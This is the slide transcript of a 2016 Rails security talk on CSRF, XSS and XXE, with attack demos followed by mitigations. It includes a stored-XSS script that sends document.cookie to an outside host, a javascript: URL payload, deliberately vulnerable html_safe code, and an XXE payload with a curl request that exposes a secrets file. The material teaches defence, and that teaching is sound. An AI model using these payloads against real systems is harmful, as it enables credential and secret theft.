Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Security: Back to Basics

Eileen M. Uchitelle
August 20, 2016
Programming
3
360

Security: Back to Basics

Presented at Abstractions - abstractions.io

The Internet is built on technology that was never meant to work together. Basic features in seemingly simple and innocuous technologies, such as XML, resulted in hidden security flaws. In this session we'll talk about how attackers exploit common vulnerabilities like CSRF, XSS, and XXE. We'll explore how easy it is to implement these vulnerabilities into your application and how to build software with security in mind.

Eileen M. Uchitelle

August 20, 2016
Tweet

More Decks by Eileen M. Uchitelle

See All by Eileen M. Uchitelle
[Brighton Ruby 2023] The Magic of Rails
eileencodes
3
300
[RailsConf 2023 Opening Keynote] The Magic of Rails
eileencodes
6
7.1k
Exit(ing) through the YJIT
eileencodes
1
340
The Success of Rails: Ensuring Growth for the Next 100 Years
eileencodes
26
5.5k
Improving CVAR Performance in Ruby 3.1
eileencodes
0
660
Upgrading GitHub from Ruby 2.6 to 2.7
eileencodes
1
3.1k
Technically, a talk | Ruby Day 2020
eileencodes
1
130
Technically, a talk | Brighton Ruby 2020
eileencodes
2
100
Technically, a talk | RailsConf 2020
eileencodes
0
100

Other Decks in Programming

See All in Programming
AWS SDKのClientは Factory経由で作ろう
iwatatomoya
1
310
スキル差があるペア_モブプロで効果的な_ドライバーナビゲータ以外のロールの分け方.pdf
yatasunshine
1
230
CircleCIでChatGPTにエラーの解説を頼んでみた
mfunaki
PRO
0
190
祝 Ver.3リリース Fluent UI Blazorのすすめ
tomokusaba
0
130
Adopting Jetpack Compose Safely (Droidcon Lisbon 2023)
stewemetal
0
100
アジャイルのライトウィングとレフトウィングはひとりで両方できなくてもいいんじゃない? - “ひとりでできるもん”から“みんなでできるもん”への道のり
psj59129
0
260
個人開発のiOSアプリでUI/UXを標準に寄せてみた / 20230919_orochi
uhooi
0
380
A JVM Threading Model for the containerized times
lhespanha
0
1k
Flutterにおけるアプリ内課金実装 -Android/iOS完全なる統一 -
nacatl
1
990
どうするLeSS - スクラムフェス三河2023.9.16
stanby_inc
1
210
Unveiling Nano Stores
ninoid
0
120
Migrating From Spring Boot 2 To Spring Boot 3 - What's Jakarta EE Got To Do with It?
ivargrimstad
0
750

Featured

See All Featured
Infographics Made Easy
chrislema
236
17k
Building Your Own Lightsaber
phodgson
97
5.2k
Building Effective Engineering Teams - LeadDev
addyosmani
21
970
Producing Creativity
orderedlist
PRO
336
38k
What's in a price? How to price your products and services
michaelherold
236
10k
Done Done
chrislema
178
15k
Easily Structure & Communicate Ideas using Wireframe
afnizarnur
184
15k
The World Runs on Bad Software
bkeepers
PRO
59
6.1k
10 Git Anti Patterns You Should be Aware of
lemiorhan
644
56k
Making the Leap to Tech Lead
cromwellryan
119
8.1k
実際に使うSQLの書き方 徹底解説 / pgcon21j-tutorial
soudai
49
16k
Design and Strategy: How to Deal with People Who Don’t "Get" Design
morganepeng
112
17k

Transcript

  1. SECURITY
    Back to Basics

    View Slide

  2. View Slide

  3. EILEEN M. UCHITELLE
    ! eileencodes.com
    " @eileencodes
    # @eileencodes
    ! speakerdeck.com/eileencodes

    View Slide

  4. Kingston, NY
    Pittsburgh, PA

    View Slide

  5. Kingston, NY
    Pittsburgh, PA
    Canada
    Buffalo, NY

    View Slide

  6. Security, Infrastructure & Performance
    Team at Basecamp

    View Slide

  7. OPEN SOURCE
    Rails Committers
    Rails Security

    View Slide

  8. View Slide

  9. View Slide

  10. How is security
    broken?

    View Slide

  11. • Impossible to test for all possible
    vulnerabilities
    How is security broken?

    View Slide

  12. • Impossible to test for all possible
    vulnerabilities
    • Hackers are always one step ahead
    How is security broken?

    View Slide

  13. • Impossible to test for all possible
    vulnerabilities
    • Hackers are always one step ahead
    • Patching one vulnerability can lead to
    exposing new ones
    How is security broken?

    View Slide

  14. How did we get
    here?

    View Slide

  15. • Failed to enforce web standards
    How did we get here?

    View Slide

  16. vs.

    View Slide

  17. View Slide

  18. • Failed to enforce web standards
    • Failed to implement a definition of
    security
    How did we get here?

    View Slide

  19. “...completely failed to come up with
    even the most rudimentary usable
    frameworks for understanding the
    security of modern software.”
    – Michal Zalewski, The Tangled Web

    View Slide

  20. • Failed to enforce web standards
    • Failed to implement a definition of
    security
    • Too few people understand the
    vulnerabilities
    How did we get here?

    View Slide

  21. View Slide

  22. CSRF

    View Slide

  23. CSRF
    Cross-Site Request Forgery

    View Slide

  24. EXPLOITING CSRF

    View Slide

  25. View Slide

  26. ARYA
    The User

    View Slide

  27. JESSIE
    The Hacker
    ARYA
    The User

    View Slide

  28. View Slide

  29. View Slide


  30. Name

    Email

    Website



    View Slide

  31. View Slide

  32. Looks the same, different URL

    View Slide



  33. Name

    Email

    Website




    View Slide


  34. Name

    Email

    Website



    Jessie’s email

    View Slide



  35. Name

    Email

    Website




    Auto-submit form

    View Slide



  36. Name

    Email

    Website




    Auto-submit form
    to victim site

    View Slide

  37. Jessie’s email

    View Slide

  38. How dangerous are
    CSRF attacks?

    View Slide

  39. How can we protect

    our users from

    CSRF attacks?

    View Slide

  40. • Use built-in framework CSRF protection
    How to mitigate CSRF?

    View Slide

  41. View Slide

  42. class ApplicationController < ActionController::Base
    protect_from_forgery with: :exception
    end

    View Slide


  43. name=authenticity_token" />
    Name

    Email

    Website



    CSRF protection

    View Slide

  44. Caveat:
    CSRF protection in Rails is
    order-dependent

    View Slide

  45. class ApplicationController < ActionController::Base
    before_action :authenticate
    protect_from_forgery with: :exception,
    if: -> { authenticate_method.web? }
    end

    View Slide

  46. class ApplicationController < ActionController::Base
    before_action :authenticate
    protect_from_forgery with: :exception,
    if: -> { authenticate_method.web? }
    end
    Conditional
    authentication

    View Slide

  47. class ApplicationController < ActionController::Base
    before_action :authenticate
    protect_from_forgery with: :exception,
    if: -> { authenticate_method.web? }
    end
    class ChatsController < ApplicationController
    skip_before_action :authenticate
    before_action :authenticate_for_chat, only: :create
    end

    View Slide

  48. class ApplicationController < ActionController::Base
    before_action :authenticate
    protect_from_forgery with: :exception,
    if: -> { authenticate_method.web? }
    end
    class ChatsController < ApplicationController
    skip_before_action :authenticate
    before_action :authenticate_for_chat, only: :create
    end
    Skip auth callback

    View Slide

  49. >> ChatsController._process_action_callbacks.map(&:filter)
    =>[
    :authenticate,
    :verify_authenticity_token,
    :authenticate_for_chat
    ]
    Authentication callback
    is too late in the chain

    View Slide

  50. class ApplicationController < ActionController::Base
    before_action :authenticate
    protect_from_forgery with: :exception,
    if: -> { authenticate_method.web? }
    end
    class ChatsController < ActionController::Base
    skip_before_action :authenticate
    before_action :authenticate_for_chat, only: :create
    protect_from_forgery with: :exception,
    if: -> { authenticate_method.web? }
    end

    View Slide

  51. >> ChatsController._process_action_callbacks.map(&:filter)
    =>[
    :authenticate,
    :authenticate_for_chat,
    :verify_authenticity_token
    ]
    Corrected
    callback order

    View Slide

  52. View Slide

  53. • Use built-in framework CSRF protection
    • Refresh tokens with the session / don’t
    reuse tokens
    How to mitigate CSRF?

    View Slide

  54. class SessionsController < ApplicationController
    def destroy
    sign_out
    reset_session
    redirect_to sign_in_url
    end
    end
    Refreshes
    Authenticity Token

    View Slide

  55. • Use built-in framework CSRF protection
    • Refresh tokens with the session / don’t
    reuse tokens
    • Mitigate XSS attacks
    How to mitigate CSRF?

    View Slide

  56. XSS

    View Slide

  57. XSS
    Cross-Site Scripting

    View Slide

  58. EXPLOITING STORED XSS

    View Slide

  59. View Slide

  60. <br/>document.write(<br/>'<img src=“http://www.hax0rcats.com/'<br/>+ document.cookie + '">'<br/>);<br/>
    automatic protection. Let’s say for some reason you wanted to allow the user to dress up their name by adding html tags. To

    View Slide

  61. View Slide

  62. Escaped HTML

    View Slide

  63. Profile
    <%= notice %>

    Name:
    <%= @user.name %>


    Email:
    <%= @user.email %>


    Website:
    <%= link_to('website', @user.website) %>

    <%= link_to 'Edit', edit_user_path(@user) %> |
    <%= link_to 'Back', users_path %>

    View Slide

  64. Profile
    <%= notice %>

    Name:
    <%= (@user.name).html_safe %>


    Email:
    <%= @user.email %>


    Website:
    <%= link_to('website', @user.website) %>

    <%= link_to 'Edit', edit_user_path(@user) %> |
    <%= link_to 'Back', users_path %>
    automatic protection. Let’s say for some reason you wanted to allow the user to dress up their name by adding html tags. To

    View Slide

  65. View Slide

  66. JavaScript Scheme

    View Slide

  67. View Slide

  68. javascript://example.com/%0Aalert(1)

    View Slide

  69. example.com/%0Aalert(1)
    JavaScript Scheme
    javascript://

    View Slide

  70. javascript://example.com/%0Aalert(1)
    URL
    example.com

    View Slide

  71. Percent encoded “line feed”
    javascript://example.com/%0Aalert(1)
    %0A

    View Slide

  72. JavaScript Alert
    javascript://example.com/%0Aalert(1)
    alert(1)

    View Slide

  73. How dangerous are
    XSS attacks?

    View Slide

  74. How can we protect

    our users from

    XSS attacks?

    View Slide

  75. • Always escape user-provided data
    How to mitigate XSS?

    View Slide

  76. Profile
    <%= notice %>

    Name:
    <%= (@user.name).html_safe %>


    Email:
    <%= @user.email %>


    Website:
    <%= link_to('website', @user.website) %>

    <%= link_to 'Edit', edit_user_path(@user) %> |
    <%= link_to 'Back', users_path %>
    Don’t do this

    View Slide

  77. View Slide

  78. • Don’t HTML escape user-provided data
    • Sanitize user-provided data
    How to mitigate XSS?

    View Slide

  79. Profile
    <%= notice %>

    Name:
    <%= sanitize(@user.name) %>


    Email:
    <%= @user.email %>


    Website:
    <%= link_to('website', @user.website) %>

    <%= link_to 'Edit', edit_user_path(@user) %> |
    <%= link_to 'Back', users_path %>
    Will strip out unwanted
    tags and attributes

    View Slide

  80. • Don’t HTML escape user-provided data
    • Sanitize user-provided data
    • Validate user-provided data
    How to mitigate XSS?

    View Slide

  81. class User < ActiveRecord::Base
    WHITELISTED_URI_SCHEMES = %w( http https )
    validate :check_uri_scheme
    private
    def check_uri_scheme
    begin
    uri = URI.parse(website)
    unless WHITELISTED_URI_SCHEMES.include?(uri.scheme.downcase)
    errors.add :website, 'is not an allowed URI scheme'
    end
    rescue URI::InvalidURIError
    errors .add :website, 'is not a valid URI'
    end
    end
    end

    View Slide

  82. class User < ActiveRecord::Base
    WHITELISTED_URI_SCHEMES = %w( http https )
    validate :check_uri_scheme
    private
    def check_uri_scheme
    begin
    uri = URI.parse(website)
    unless WHITELISTED_URI_SCHEMES.include?(uri.scheme.downcase)
    errors.add :website, 'is not an allowed URI scheme'
    end
    rescue URI::InvalidURIError
    errors .add :website, 'is not a valid URI'
    end
    end
    end

    View Slide

  83. class User < ActiveRecord::Base
    WHITELISTED_URI_SCHEMES = %w( http https )
    validate :check_uri_scheme
    private
    def check_uri_scheme
    begin
    uri = URI.parse(website)
    unless WHITELISTED_URI_SCHEMES.include?(uri.scheme.downcase)
    errors.add :website, 'is not an allowed URI scheme'
    end
    rescue URI::InvalidURIError
    errors .add :website, 'is not a valid URI'
    end
    end
    end

    View Slide

  84. XXE

    View Slide

  85. XXE
    XML eXternal Entity Attack

    View Slide



  86. ]>

    Take a nap
    Go on a long walk with my hooman
    &ext1;
    Take another nap
    Go to bed

    View Slide



  87. ]>

    Take a nap
    Go on a long walk with my hooman
    &ext1;
    Take another nap
    Go to bed

    Entity reference

    View Slide


  88. Eat breakfast
    Bark at the mail carrier

    View Slide



  89. Take a nap
    Go on a long walk with my hooman
    Eat breakfast
    Bark at the mail carrier
    Take another nap
    Go to bed

    View Slide

  90. EXPLOITING XXE

    View Slide

  91. class UsersController < ApplicationController
    def create
    @user = User.new(user_params)
    respond_to do |format|
    if @user.save
    format.html { redirect_to @user }
    format.xml { render :xml => @user.to_xml }
    else
    format.html { render :new }
    format.xml { render xml: @user.errors.to_xml }
    end
    end
    end
    end

    View Slide

  92. class UsersController < ApplicationController
    def create
    @user = User.new(user_params)
    respond_to do |format|
    if @user.save
    format.html { redirect_to @user }
    format.xml { render :xml => @user.to_xml }
    else
    format.html { render :new }
    format.xml { render xml: @user.errors.to_xml }
    end
    end
    end
    end
    XML

    View Slide

  93. config/secrets.yml">
    ]>

    &name;

    View Slide

  94. config/secrets.yml">
    ]>

    &name;

    Requested file

    View Slide

  95. config/secrets.yml">
    ]>

    &name;

    Entity reference

    View Slide

  96. curl -X 'POST'
    -H 'Content-Type: application/xml'
    -d @xxe.xml
    http://dogbook.com/users.xml
    POST request to
    users create

    View Slide

  97. curl -X 'POST'
    -H 'Content-Type: application/xml'
    -d @xxe.xml
    http://dogbook.com/users.xml
    Payload

    View Slide

  98. curl -X 'POST'
    -H 'Content-Type: application/xml'
    -d @xxe.xml
    http://dogbook.com/users.xml


    ...
    production:
    secret_key_base:
    271a389cf7bf7b4ff18af3e809241603802b5ff1617b5432a41ff0f99d5
    f29c897db7f07a9cebd9e3a3535301720c0b19ac4eb82afa505ed229c40
    00e166a9a5
    ...


    secrets.yml
    as user’s name

    View Slide

  99. View Slide

  100. How dangerous are
    XXE attacks?

    View Slide

  101. View Slide

  102. How can we protect

    our servers from

    XXE attacks?

    View Slide

  103. • Don’t parse XML
    How to mitigate XXE?

    View Slide

  104. Don’t parse XML

    View Slide

  105. • Don’t parse XML
    • Don’t use parsers that allow entity
    replacement (LibXML)
    How to mitigate XXE?

    View Slide

  106. >> LibXML::XML.default_substitute_entities
    >> true

    View Slide

  107. • Don’t parse XML
    • Don’t use parsers that allow entity
    replacement (LibXML)
    • Whitelist known entities
    How to mitigate XXE?

    View Slide

  108. Investigate vulnerabilities & patches
    SECURITY

    View Slide

  109. GitHub

    eileencodes/security_examples

    View Slide

  110. owasp.org

    View Slide

  111. View Slide

  112. Brakeman

    View Slide

  113. Resilience & empowerment
    SECURITY

    View Slide

  114. View Slide

  115. Awareness of vulnerabilities
    SECURITY

    View Slide

  116. JESSIE
    The Hacker
    ARYA
    The User

    View Slide

  117. View Slide

  118. To the future

    View Slide

  119. Thank You!
    Come find me for questions
    and Basecamp stickers

    View Slide

  120. EILEEN M. UCHITELLE
    Security, Infrastructure & Performance
    Team at Basecamp
    ! eileencodes.com
    " @eileencodes
    # @eileencodes
    ! speakerdeck.com/eileencodes

    View Slide